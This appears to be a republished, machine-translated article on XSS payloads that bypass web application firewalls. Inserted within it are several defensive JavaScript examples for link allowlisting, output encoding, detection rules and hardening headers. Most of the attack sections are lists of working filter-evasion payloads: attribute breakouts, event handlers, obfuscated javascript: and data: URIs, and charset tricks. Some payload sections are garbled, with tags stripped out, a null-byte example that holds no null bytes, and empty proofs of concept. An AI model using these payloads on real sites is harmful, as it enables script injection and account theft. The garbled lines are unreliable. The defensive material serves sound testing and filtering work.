2025-01-16 Update From: SLTechnology News&Howtos, Network Security
Shulou(Shulou.com)05/31 Report--
What are modern WAF rule detection and bypass techniques for XSS? Many newcomers are unsure how to approach this, so this article summarises the causes of the problem and the corresponding solutions; I hope it helps you work through it.
Initial test
1. Use a harmless payload and observe the response to determine whether the application HTML-encodes the output, whether the tag is filtered, whether anything else is filtered, and so on.
2. If closing tags are filtered, try a payload that does not need a closing tag (works with IE8).
Brackets are filtered
The first payload is credited to @secalert. If it is filtered, an autofocus handler still fires: " autofocus onfocus=alert(1) //. The basic idea is to use " to close the value attribute and then append the script to execute:
" onmouseover=prompt(0) x="
" onfocusin=alert(1) autofocus x="
" onfocusout=alert(1) autofocus x="
" onblur=alert(1) autofocus a="
When the input is reflected inside a script tag, it looks like this: var x = "Input". Usually we use "> to close the previous tag, but in this case we can also enter the script directly, such as alert(), prompt() or confirm(), for example: "; alert(1) //
Unconventional event listeners
Events such as DOMFocusIn and DOMFocusOut only fire when the matching action happens, so the listener has to be registered for the right event. For example:
document.body.addEventListener("DOMActivate", alert(1)) //
"; document.body.addEventListener("DOMActivate", prompt(1)) //
"; document.body.addEventListener("DOMActivate", confirm(1)) //
A list of such events:
DOMAttrModified
DOMCharacterDataModified
DOMFocusIn
DOMFocusOut
DOMMouseScroll
DOMNodeInserted
DOMNodeInsertedIntoDocument
DOMNodeRemoved
DOMNodeRemovedFromDocument
DOMSubtreeModified
Hypertext content
The situation in the code is as follows: the input lands in the target of a link labelled Click. Entering _ javascript:alert(1) // executes the script directly when Click is used.
Deformation
Mainly case variation and JavaScript deformation:
Javascript:alert(1)
javaSCRIPT:alert(1)
_ JaVaScRipT:alert(1)
javas	cript:\u0061lert(1);
_ javascript:\u0061lert
VBScript can be used below IE10 and in URIs:
_ vbscript:alert(1);
vbscript:alert(1);
vbscr	ipt:alert(1)"
Data URI
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
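The deformations above all target the same weak check: a filter that looks for the literal string "javascript:". As an added example (not code from the article), the following allowlist check for a user-supplied link target undoes the transformations those bypasses rely on (case changes, tab and newline characters inside the scheme, leading whitespace, numeric and named entities) before it looks at the scheme, and accepts only http, https, mailto and scheme-less relative links. The function and constant names are ours, and the sample links are constructed from the article's variants.

```javascript
// Added example, not code from the article: allowlist check for a link target.
// Function and constant names are ours.

const ALLOWED_SCHEMES = new Set(["http", "https", "mailto"]);

// Decode the entity forms that can appear inside an HTML attribute value.
function decodeEntities(s) {
  const fromCode = (n) => (n >= 0 && n <= 0x10ffff ? String.fromCodePoint(n) : "");
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => fromCode(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => fromCode(parseInt(d, 10)))
    .replace(/&tab;/gi, "\t")
    .replace(/&newline;/gi, "\n")
    .replace(/&colon;/gi, ":")
    .replace(/&amp;/gi, "&");
}

// Mirror the browser's URL parser: tab, LF and CR are dropped anywhere in the
// value, and leading/trailing C0 controls and spaces are ignored.
function normaliseUrl(raw) {
  return decodeEntities(String(raw))
    .replace(/[\t\n\r]/g, "")
    .replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, "");
}

// Extract the scheme the browser would see, or null for a relative reference.
function schemeOf(raw) {
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(normaliseUrl(raw));
  return m ? m[1].toLowerCase() : null;
}

// True when the link is relative or uses an allowed scheme; everything else,
// including javascript:, vbscript: and data:, is rejected.
function isSafeHref(raw) {
  const scheme = schemeOf(raw);
  return scheme === null || ALLOWED_SCHEMES.has(scheme);
}

// Constructed test inputs: benign links plus the article's deformation examples.
const SAMPLE_LINKS = [
  "https://example.com/page",
  "/relative/path?x=1",
  "mailto:user@example.com",
  "JaVaScRipT:alert(1)",
  "javas\tcript:\\u0061lert(1)",
  " javascript:alert(1)",
  "vbscr\tipt:alert(1)",
  "data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==",
  "java&#x09;script:alert(1)",
  "&#106;avascript:alert(1)",
];

function classifyLinks(links = SAMPLE_LINKS) {
  return links.map((href) => ({ href, safe: isSafeHref(href) }));
}

if (typeof require !== "undefined" && require.main === module) {
  for (const r of classifyLinks()) {
    console.log(r.safe ? "allow " : "reject", JSON.stringify(r.href));
  }
}
```

The check is deliberately an allowlist on the scheme rather than a blacklist of "javascript"/"vbscript"/"data" spellings: normalising first and then comparing against three permitted schemes leaves no room for a fourth spelling the filter author did not think of.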
JSON content
Reflected input:
encodeURIComponent('Input')
Can be used:
'-alert(1)-'
'-prompt(1)-'
'-confirm(1)-'
Result:
encodeURIComponent(''-alert(1)-'')
encodeURIComponent(''-prompt(1)-'')
encodeURIComponent(''-confirm(1)-'')
Input reflected inside an svg tag
The source code is as follows:
var myvar = "YourInput"
You can enter:
www.site.com/test.php?var=text";alert(1)//
Even if the system encodes the " character, the script that ends up running is:
var myvar = "text";alert(1)//"
The reason is that svg introduces XML content into the HTML, and the value is decoded twice: the XML parser decodes the encoded quote before the script executes.
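The script-string cases above (the "; alert(1) // break-out, the encodeURIComponent('...') reflection and the svg example) share one root cause: the value was placed inside a JavaScript string literal with either no encoding or HTML entity encoding. Inside svg the XML parser decodes the entity before the script runs, so entity-encoding a quote does not protect a script string; JavaScript \uHHHH escapes do, because no markup parser undoes them. The following added example (not code from the article) shows the two encoders a template should use, one per context; the function names are ours and the sample payloads are the article's own.

```javascript
// Added example, not code from the article: context-specific output encoding.
// Function names are ours.

// For values placed in a quoted HTML attribute (always quote the attribute).
const ATTR_MAP = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;", "/": "&#x2F;" };
function htmlAttrEncode(value) {
  return String(value).replace(/[&<>"'\/]/g, (c) => ATTR_MAP[c]);
}

// For values placed inside a JS string literal: every character outside
// [A-Za-z0-9] becomes \uHHHH, so no quote, ampersand, newline or "</script>"
// survives in raw form, whichever parser (HTML, XML/svg) sees the page first.
function jsStringEscape(value) {
  return String(value).replace(/[^A-Za-z0-9]/g, (c) =>
    "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

// The script fragment from the article's svg example, built safely.
function renderScriptAssignment(name, userInput) {
  if (!/^[A-Za-z_$][\w$]*$/.test(name)) throw new Error("invalid identifier");
  return "var " + name + " = \"" + jsStringEscape(userInput) + "\";";
}

// Round trip: JSON understands the same \uHHHH escapes, so this proves the
// escaping is lossless without evaluating any code.
function decodeEscaped(escaped) {
  return JSON.parse('"' + escaped + '"');
}

// Constructed inputs taken from the article's payloads.
const ATTRIBUTE_PAYLOAD = '" onmouseover=prompt(0) x="';
const SCRIPT_PAYLOAD = 'text";alert(1)//';

if (typeof require !== "undefined" && require.main === module) {
  console.log('<input value="' + htmlAttrEncode(ATTRIBUTE_PAYLOAD) + '">');
  console.log(renderScriptAssignment("myvar", SCRIPT_PAYLOAD));
}
```

Escaping every non-alphanumeric character is more than strictly necessary, but it removes the need to reason about which characters matter in which nesting of parsers, which is exactly the reasoning the svg case shows to be fragile.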
Browser bugs
Character set bugs
Character set bugs are very common in IE; the earliest one is UTF-7. If we can control the character set encoding, we can bypass 99% of WAF filtering.
Example:
http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=XSS
Because the encoding can be controlled, the submission
http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=">
can be rewritten in UTF-32 encoded form (which renders as ??script?alert(1)?/script? under the wrong charset):
http://xsst.sinaapp.com/utf-32-1.php?charset=utf-32&v=%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80
Null byte
The most commonly used way to bypass the mod_security firewall is as follows:
alert(1); alert(1); confirm(0)
Null bytes only apply to PHP versions above 5.3.8.
Syntax bugs
The node name in the RFC declaration cannot contain a space, yet the following forms still run JavaScript:
alert(1); // Works up to IE7, reference http://html5sec.org/#71
// Works up to IE9, reference http://html5sec.org/#115
// Works in IE7, reference http://html5sec.org/#77
// Works up to IE7
Unicode delimiters
The rule [on\w+\s*] filters all on* events. To verify which delimiters each browser accepts, fuzz the bytes 0x00 to 0xff. The results are as follows:
IExplorer = [0x09, 0x0C, 0x20, 0x3B]
Chrome = [0x09, 0x28, 0x2C, 0x3B]
Safari = [0x2C, 0x3B]
Safari = [0x09, 0x20, 0x28, 0x2C, 0x3B]
Opera = [0x09, 0x20, 0x2C, 0x3B]
Android = [0x09, 0x2C, 0x3B]
0x0B is already filtered by mod_security; rhainfosec published a method for bypassing it.
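Two detection lessons follow from the "Unconventional event listeners" and "Unicode delimiters" sections: a rule should not depend on which separator byte sits in front of an attribute, and a rule set that only knows on*= attributes misses listener registration and the DOM* event names. The following added example (not code from the article) is a small rule harness that applies both. It collapses every control character and space (which covers the 0x09, 0x0B, 0x0C and 0x20 entries of the fuzzing table) to one space before any rule runs, then matches three rules, including one written with the classic separator class that lacks vertical tab so the effect of normalisation is visible. It assumes percent- and entity-decoding already happened upstream; rule and function names are ours, and the samples are constructed from the article's payloads plus benign text.

```javascript
// Added example, not code from the article: delimiter normalisation plus rules
// for listener registration and DOM mutation events. Names are ours.

const DOM_EVENTS = [
  "DOMActivate", "DOMAttrModified", "DOMCharacterDataModified", "DOMFocusIn",
  "DOMFocusOut", "DOMMouseScroll", "DOMNodeInserted", "DOMNodeInsertedIntoDocument",
  "DOMNodeRemoved", "DOMNodeRemovedFromDocument", "DOMSubtreeModified",
];

// Collapse every C0 control character and space into a single space.
function normaliseDelimiters(input) {
  return String(input).replace(/[\x00-\x20]+/g, " ");
}

// The classic separator class (space, tab, LF, CR, FF, slash) lacks VT (0x0B),
// which is the gap the article describes; it is kept here to show the effect.
const CLASSIC_SEP = "[ \\t\\n\\r\\f/]";

const RULES = [
  // a tag, then a separator, then an on* attribute: <input ... onfocus=
  { name: "inline-handler", re: new RegExp("<[a-z][^>]*?" + CLASSIC_SEP + "on[a-z]+\\s*=", "i") },
  // listener registration in script context
  { name: "listener-registration", re: /\baddEventListener\s*\(/i },
  // any of the mutation/focus events listed in the article
  { name: "dom-mutation-event", re: new RegExp("\\b(?:" + DOM_EVENTS.join("|") + ")\\b") },
];

// Returns the names of the rules that fire. The `normalise` option switches the
// delimiter normalisation off so the two behaviours can be compared.
function matchRules(input, { normalise = true } = {}) {
  const text = normalise ? normaliseDelimiters(input) : String(input);
  return RULES.filter((r) => r.re.test(text)).map((r) => r.name);
}

// Constructed samples: the article's listener payload, an attribute payload
// using 0x0B as the separator, and two benign inputs.
const SAMPLES = [
  'document.body.addEventListener("DOMActivate", alert(1))//',
  "<input\x0bautofocus\x0bonfocus=alert(1)>",
  '<a href="/docs" title="Documentation">docs</a>',
  "Meeting moved to Monday, 10:00",
];

function report(samples = SAMPLES) {
  return samples.map((s) => ({
    input: s,
    raw: matchRules(s, { normalise: false }),
    normalised: matchRules(s),
  }));
}

if (typeof require !== "undefined" && require.main === module) {
  for (const r of report()) console.log(JSON.stringify(r));
}
```

Run on the samples, the 0x0B payload matches nothing without normalisation and matches "inline-handler" with it; the listener payload triggers both the registration rule and the event-name rule; the two benign inputs match nothing either way.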
Missing X-Frame-Options
X-Frame-Options is generally thought of as a defence against clickjacking, but it also blocks XSS payloads that depend on loading the page in an iframe.
Docmodes
IE introduced document modes long ago to stay backward compatible with older browsers, and that is risky. The attack scenario: an attacker frames your site and forces a document mode in which CSS expressions execute:
_ expression(open(alert(1)
The corresponding POC targets IE7.
window.name spoofing
Scenario: we load a page with an iframe and control the window's name; JavaScript can be executed here as well.
POC
A
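The charset, X-Frame-Options, docmode and window.name sections all describe conditions the server can refuse to create: an attacker-chosen response charset, and a page that lets itself be framed by another origin. The following added example (not code from the article) is a response-hardening helper that shows the vulnerable charset handling beside the corrected one and emits the framing and document-mode headers. Header names and values are standard; the function and option names are ours.

```javascript
// Added example, not code from the article: response hardening for the
// charset and framing cases. Function and option names are ours.

const ALLOWED_CHARSETS = new Set(["utf-8"]);

// The vulnerable pattern: the request's charset parameter is echoed into the
// Content-Type header, so the client can pick UTF-7 or UTF-32.
function unsafeContentType(requestedCharset) {
  return "text/html; charset=" + requestedCharset;
}

// Corrected: a charset is taken only from the allowlist; anything else falls
// back to UTF-8, and the header always pins a charset explicitly.
function chooseCharset(requestedCharset) {
  const wanted = String(requestedCharset || "").trim().toLowerCase();
  return ALLOWED_CHARSETS.has(wanted) ? wanted : "utf-8";
}

// framing: "none" blocks all framing, "self" allows same-origin frames only.
// X-Frame-Options handles older browsers; frame-ancestors is its CSP successor;
// X-UA-Compatible asks IE for its newest document mode rather than an
// inherited legacy one.
function hardenedHeaders({ requestedCharset = null, framing = "none" } = {}) {
  if (framing !== "none" && framing !== "self") {
    throw new Error("framing must be 'none' or 'self'");
  }
  return {
    "Content-Type": "text/html; charset=" + chooseCharset(requestedCharset),
    "X-Content-Type-Options": "nosniff",
    "X-Frame-Options": framing === "self" ? "SAMEORIGIN" : "DENY",
    "Content-Security-Policy": "frame-ancestors " + (framing === "self" ? "'self'" : "'none'"),
    "X-UA-Compatible": "IE=edge",
  };
}

// Apply to any object with setHeader(name, value), e.g. a Node http.ServerResponse.
function applyHeaders(res, headers) {
  for (const [name, value] of Object.entries(headers)) res.setHeader(name, value);
  return res;
}

// Usage with Node's http module (constructed; the server is not started here):
//   http.createServer((req, res) => {
//     const charset = new URL(req.url, "http://localhost").searchParams.get("charset");
//     applyHeaders(res, hardenedHeaders({ requestedCharset: charset }));
//     res.end("<!doctype html><title>ok</title>");
//   }).listen(8080);

if (typeof require !== "undefined" && require.main === module) {
  console.log("unsafe:", unsafeContentType("utf-32"));
  console.log("hardened:", hardenedHeaders({ requestedCharset: "utf-32" }));
}
```

Note that the charset must be fixed on the server side because the browser will honour whatever Content-Type it receives; a WAF rule on the charset parameter only treats the symptom.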
Dot Defender bypass
Blacklisting is never the best solution, but it is relatively efficient compared with whitelisting. For WAF vendors, the best practices are as follows:
1. Developers and administrators should note that a WAF can only mitigate attacks; protecting against a known weakness only buys time compared with fixing the source code.
2. Keep the WAF rule base updated.
3. A WAF can enforce parameter restrictions; provide a manual for configuring them: the minimum and maximum Content-Length, the allowed Content-Type, and alerting when an intrusion occurs.
4. If the WAF is blacklist-based, make sure known browser bugs can be blocked and the corresponding rules are updated promptly.
After reading the above, have you mastered the methods of XSS modern WAF rule detection and bypass technology? If you want to learn more skills or learn more about the topic, you are welcome to follow the industry information channel. Thank you for reading!